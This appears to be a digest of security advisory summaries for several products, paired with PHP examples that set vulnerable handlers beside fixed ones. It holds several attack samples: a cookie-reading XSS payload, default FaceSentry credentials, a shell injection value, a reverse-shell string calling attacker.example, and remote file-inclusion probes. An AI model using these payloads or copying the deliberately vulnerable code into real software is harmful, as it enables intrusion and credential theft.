This exploit script targets the FreeBSD-SA-19:02.fd vulnerability. It was written by Karsten König of Secfault Security and uses a libmap.conf primitive inspired by kcope's 2005 exploit for Qpopper. It creates a thread and then forks to trigger the vulnerability.
Passing a huge string as the argument to DOMParser.parseFromString crashes the tab in Firefox 67.0.4 (denial of service).
An authentication bypass vulnerability in the WP Like Button (Free) plugin version 1.6.0 allows unauthenticated attackers to change the plugin's settings. The contains() function in wp_like_button.php did not check whether the current request was made by an authorized user, so any unauthenticated user could update the plugin's settings.
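The defect described above is a missing authorization check in a settings handler. The following is an added illustration, not the plugin's own code: a WordPress AJAX settings handler in the vulnerable shape, and the same handler with the capability and nonce checks the fix needs. The hook names, option name, field names and the `wplb_` prefix are assumptions for this example (PHP 7.4+ and the WordPress plugin API).

```php
<?php
// Added example, not code from the WP Like Button plugin. Hook names, the option
// name and the field names are assumptions.

// VULNERABLE: when this is registered on wp_ajax_nopriv_* as well as wp_ajax_*,
// WordPress dispatches it for logged-out visitors, and nothing here asks who is
// calling, so any anonymous POST rewrites the plugin's settings.
function wplb_save_settings_vulnerable() {
    $settings = array(
        'position' => isset($_POST['position']) ? sanitize_text_field(wp_unslash($_POST['position'])) : 'top',
        'show_on'  => isset($_POST['show_on'])  ? sanitize_text_field(wp_unslash($_POST['show_on']))  : 'post',
    );
    update_option('wplb_settings', $settings);
    wp_send_json_success($settings);
}
// add_action('wp_ajax_wplb_save_settings',        'wplb_save_settings_vulnerable');
// add_action('wp_ajax_nopriv_wplb_save_settings', 'wplb_save_settings_vulnerable'); // exposes it anonymously

// FIXED: logged-in hook only, an explicit capability check (is_user_logged_in()
// alone would still let a subscriber through), and a nonce so a logged-in admin
// cannot be made to submit the request from a third-party page.
function wplb_save_settings_fixed() {
    if (!current_user_can('manage_options')) {
        wp_send_json_error('forbidden', 403);      // sends the response and exits
    }
    check_ajax_referer('wplb_save_settings', '_wpnonce'); // dies with 403 on a bad/missing nonce

    $settings = array(
        'position' => isset($_POST['position']) ? sanitize_text_field(wp_unslash($_POST['position'])) : 'top',
        'show_on'  => isset($_POST['show_on'])  ? sanitize_text_field(wp_unslash($_POST['show_on']))  : 'post',
    );
    update_option('wplb_settings', $settings);
    wp_send_json_success($settings);
}
add_action('wp_ajax_wplb_save_settings', 'wplb_save_settings_fixed');

// The admin page that issues the AJAX call embeds the matching nonce:
function wplb_settings_page_nonce_field(): string {
    return wp_nonce_field('wplb_save_settings', '_wpnonce', true, false);
}
```

The order of the two checks matters for the error the caller sees, not for safety; what matters is that authorization (who may do this) and request provenance (did this user mean to do it) are both enforced before `update_option()` runs.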
This module attempts to gain root privileges on systems running Serv-U FTP Server versions prior to 15.1.7. The `Serv-U` executable is setuid `root` and passes `ARGV[0]` unvalidated to `system()` when invoked with the `-prepareinstallation` flag. Because the process that starts a program chooses its argv[0] freely (for example via execv()), this results in command execution with root privileges.
Persistent XSS via the 'name' parameter at /ProtectManager/enforce/admin/senderrecipientpatterns/list. Payload: ' oNmouseover=prompt(document.domain,document.cookie) ) Browsers tested: Firefox 64, IE 11. Date observed: 15 January 2019.
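The payload above opens with a single quote, which is what breaks it out of an attribute value so that oNmouseover= becomes an event-handler attribute. The following is an added illustration, not the affected application's code, of a template rendering the stored 'name' value three ways: raw, with the pre-PHP-8.1 default of htmlspecialchars() (which leaves single quotes alone), and correctly encoded for the attribute context. The template shape is an assumption.

```php
<?php
// Added example, not code from the affected product. The template markup is assumed;
// the payload string is the one reported above, embedded here as a constructed value.
$name = "' oNmouseover=prompt(document.domain,document.cookie) )";

// VULNERABLE: raw value in a single-quoted attribute. The leading ' closes
// value='' and everything after it is parsed as further attributes.
function render_row_vulnerable(string $name): string {
    return "<input type='text' name='pattern' value='" . $name . "'>";
}

// STILL VULNERABLE: ENT_COMPAT (the default before PHP 8.1) encodes " but not ',
// so a single-quoted attribute is still broken out of.
function render_row_half_fixed(string $name): string {
    return "<input type='text' name='pattern' value='" . htmlspecialchars($name, ENT_COMPAT) . "'>";
}

// FIXED: encode for the attribute context. ENT_QUOTES encodes both quote kinds,
// ENT_SUBSTITUTE keeps invalid UTF-8 from silently emptying the output.
function render_row_fixed(string $name): string {
    $safe = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
    return "<input type='text' name='pattern' value='" . $safe . "'>";
}

// Check each rendering: does an oNmouseover attribute appear outside the value?
function breaks_out_of_attribute(string $html): bool {
    return preg_match("/value='[^']*'\s*oNmouseover/i", $html) === 1;
}

foreach (['vulnerable' => render_row_vulnerable($name),
          'half_fixed' => render_row_half_fixed($name),
          'fixed'      => render_row_fixed($name)] as $label => $html) {
    printf("%-10s breaks attribute: %s\n  %s\n", $label, breaks_out_of_attribute($html) ? 'yes' : 'no', $html);
}
```

Because the issue is persistent, the value reaches the page from storage rather than from the current request; encoding therefore belongs at render time, for the context the value lands in, regardless of any filtering done on input.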
A vulnerability in Centreon v19.04 allows an authenticated user to execute arbitrary OS commands on the server. It is caused by missing input validation of the 'nagios_bin' parameter of the 'poller_configuration.php' script. An attacker exploits it by submitting a malicious value for 'nagios_bin', which is then executed on the server.
The FaceSentry facial biometric access control appliance ships with hard-coded, weak credentials for SSH access on port 23445 (wwwuser:123456). Root privilege escalation is then possible by abusing an insecure sudoers entry.
FaceSentry suffers from an authenticated OS command injection vulnerability that is reachable with the default credentials. It can be exploited to inject and execute arbitrary shell commands as the root user via the 'strInIP' POST parameter of the pingTest PHP script.
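The Centreon 'nagios_bin' entry and the FaceSentry 'strInIP' entry above are two shapes of the same bug: a string the attacker controls reaches a shell. The following is an added illustration, not Centreon's or FaceSentry's code, showing both shapes in their vulnerable form beside a hardened form: a request parameter interpolated into a ping command, and a stored "path to a binary" setting later executed. Function names, the allowed binary directory and the demo inputs are assumptions (PHP 8.0+).

```php
<?php
// Added example, not code from Centreon or FaceSentry. Function names, the
// allowed directory and the attacker strings are constructed for this example.

// VULNERABLE (strInIP shape): concatenation into a shell command. An strInIP of
//   127.0.0.1; id
// runs `id` with the privileges of whatever executes the script (root, per the entry).
function ping_test_vulnerable(string $strInIP): string {
    return (string) shell_exec("ping -c 1 " . $strInIP);
}

// FIXED: accept only a literal IP address; anything else is rejected before it
// gets near a shell. escapeshellarg() is the second line of defence, not the first.
function ping_test_fixed(string $strInIP): string {
    $ip = filter_var(trim($strInIP), FILTER_VALIDATE_IP);
    if ($ip === false) {
        throw new InvalidArgumentException('strInIP must be an IPv4 or IPv6 address');
    }
    return (string) shell_exec("ping -c 1 " . escapeshellarg($ip));
}

// VULNERABLE (nagios_bin shape): a configuration value trusted as a program path.
// A stored value such as
//   /usr/sbin/centengine; nc -e /bin/sh attacker.example 4444
// is executed every time the poller configuration is applied.
function run_engine_vulnerable(string $nagios_bin, string $cfg): string {
    return (string) shell_exec($nagios_bin . " -v " . $cfg);
}

// FIXED: the value must resolve to an existing executable inside an allowed
// directory; the resolved path (not the submitted string) is what runs, and each
// argument is quoted separately.
function run_engine_fixed(string $nagios_bin, string $cfg, string $allowed_dir = '/usr/sbin'): string {
    $real = realpath($nagios_bin);
    $base = realpath($allowed_dir);
    if ($real === false || $base === false
        || !str_starts_with($real, $base . DIRECTORY_SEPARATOR)
        || !is_file($real) || !is_executable($real)) {
        throw new InvalidArgumentException('nagios_bin is not an executable under ' . $allowed_dir);
    }
    return (string) shell_exec(escapeshellarg($real) . ' -v ' . escapeshellarg($cfg));
}

// Demo with constructed attacker input: only the vulnerable form executes it.
$attacker_ip = '127.0.0.1; id';
echo "vulnerable ping output:\n", ping_test_vulnerable($attacker_ip), "\n";
try {
    ping_test_fixed($attacker_ip);
} catch (InvalidArgumentException $e) {
    echo "fixed ping rejected input: ", $e->getMessage(), "\n";
}
try {
    run_engine_fixed('/tmp/evil; id', '/etc/centreon-engine/centengine.cfg');
} catch (InvalidArgumentException $e) {
    echo "fixed engine runner rejected input: ", $e->getMessage(), "\n";
}
```

The ping case is fixed by validation because the input has a precise grammar; the binary-path case cannot be validated by pattern alone, so the check is on what the string resolves to on disk, and the stored value should be treated as untrusted every time it is read, not only when an administrator saves it.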
A CSRF vulnerability allows an attacker to edit the administrator's credentials, such as the email address and password, then log in to the administration panel and take over the server.
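The entry above does not name the missing control, so the following is an added illustration, not the affected application's code, of a credential-change handler without and with CSRF protection: a per-session random token that an attacker's page cannot read, compared in constant time, a SameSite session cookie, and re-authentication for the credential change itself. Field names, the in-memory admin record and the demo inputs are assumptions constructed for this example (PHP 7.4+).

```php
<?php
// Added example, not code from the affected application. Field names, the admin
// record and the demo POST bodies are constructed for this example.

session_set_cookie_params(['httponly' => true, 'secure' => true, 'samesite' => 'Lax']);
session_start();

// Stand-in for the application's stored administrator (constructed).
$ADMIN = ['email' => 'admin@example.test', 'hash' => password_hash('old-secret', PASSWORD_DEFAULT)];

function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

function csrf_check(?string $submitted): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    return $submitted !== null && $expected !== '' && hash_equals($expected, $submitted);
}

// VULNERABLE: any POST arriving with the admin's session cookie is honoured, so a
// hidden auto-submitting form on an attacker's site rewrites the credentials.
function update_admin_vulnerable(array &$admin, array $post): bool {
    $admin['email'] = $post['email'];
    $admin['hash']  = password_hash($post['password'], PASSWORD_DEFAULT);
    return true;
}

// FIXED: a valid token is required, and a credential change additionally
// demands the current password, so a leaked token alone is not enough.
function update_admin_fixed(array &$admin, array $post): bool {
    if (!csrf_check($post['csrf_token'] ?? null)) {
        http_response_code(403);
        return false;
    }
    if (!password_verify($post['current_password'] ?? '', $admin['hash'])) {
        http_response_code(403);
        return false;
    }
    $admin['email'] = $post['email'];
    $admin['hash']  = password_hash($post['password'], PASSWORD_DEFAULT);
    return true;
}

// Form side: the token travels as a hidden field, HTML-encoded.
function render_credentials_form(): string {
    $t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
    return "<form method='post' action='/admin/credentials'>"
         . "<input type='hidden' name='csrf_token' value='$t'>"
         . "<input name='email'><input name='current_password' type='password'>"
         . "<input name='password' type='password'><button>Save</button></form>";
}

// Demo: a forged cross-site POST carries no token and no current password.
$forged = ['email' => 'attacker@evil.test', 'password' => 'pwned'];
$legit  = $forged + ['csrf_token' => csrf_token(), 'current_password' => 'old-secret'];
printf("fixed handler, forged POST accepted:      %s\n", update_admin_fixed($ADMIN, $forged) ? 'yes' : 'no');
printf("fixed handler, legitimate POST accepted:  %s\n", update_admin_fixed($ADMIN, $legit) ? 'yes' : 'no');
printf("vulnerable handler, forged POST accepted: %s\n", update_admin_vulnerable($ADMIN, $forged) ? 'yes' : 'no');
```

SameSite=Lax stops the browser attaching the session cookie to cross-site POSTs in current browsers, but the token check is what makes the fix hold for older clients and for any GET-based state change a framework might still allow.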
An issue was discovered in the Safi-pro web application: a directory traversal and local/remote file inclusion vulnerability in the ?script= parameter of the Script_View page. An attacker can send a specially crafted URL to retrieve sensitive files from the victim.
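The entry above describes a request parameter used directly as an include path. The following is an added illustration, not Safi-pro's code, of that pattern and a replacement in which the parameter is only a key into an allow-list, with a realpath() containment check as a second guard. The directory name, the allow-list entries and the probe strings are assumptions constructed for this example (PHP 8.0+).

```php
<?php
// Added example, not code from Safi-pro. Directory, allow-list and probe values are assumed.

// VULNERABLE: the request parameter becomes the include path.
//   ?script=../../../../etc/passwd             -> traversal out of the directory (LFI)
//   ?script=php://filter/convert.base64-encode/resource=index.php -> source disclosure via a wrapper
//   ?script=http://attacker.example/shell.txt  -> remote code execution if allow_url_include=On (RFI)
function script_view_vulnerable(string $script): void {
    include 'scripts/' . $script;
}

// FIXED: the parameter selects from a fixed list; the real path never comes from
// the request. realpath() containment guards against the list itself ever being
// populated from a less trustworthy source.
const SCRIPT_DIR = __DIR__ . '/scripts';
const ALLOWED_SCRIPTS = ['summary' => 'summary.php', 'export' => 'export.php'];

function resolve_script(string $script): ?string {
    if (!array_key_exists($script, ALLOWED_SCRIPTS)) {
        return null;                                   // not on the list: refuse
    }
    $path = realpath(SCRIPT_DIR . '/' . ALLOWED_SCRIPTS[$script]);
    $base = realpath(SCRIPT_DIR);
    if ($path === false || $base === false || !str_starts_with($path, $base . DIRECTORY_SEPARATOR)) {
        return null;                                   // file missing, or resolved outside the directory
    }
    return $path;
}

function script_view_fixed(string $script): void {
    $path = resolve_script($script);
    if ($path === null) {
        http_response_code(404);
        echo 'unknown script';
        return;
    }
    include $path;
}

// Demo with constructed probe values. 'summary' resolves only once scripts/summary.php exists.
foreach (['../../../../etc/passwd',
          'php://filter/convert.base64-encode/resource=index.php',
          'http://attacker.example/shell.txt',
          'summary'] as $candidate) {
    $r = resolve_script($candidate);
    printf("%-60s -> %s\n", $candidate, $r === null ? 'refused' : $r);
}
```

Stripping "../" from the parameter is not a substitute for this: wrappers such as php://filter contain no traversal sequence at all, and encoding variants get past naive filters. Setting allow_url_include=Off in php.ini removes the remote-inclusion half independently of the application code.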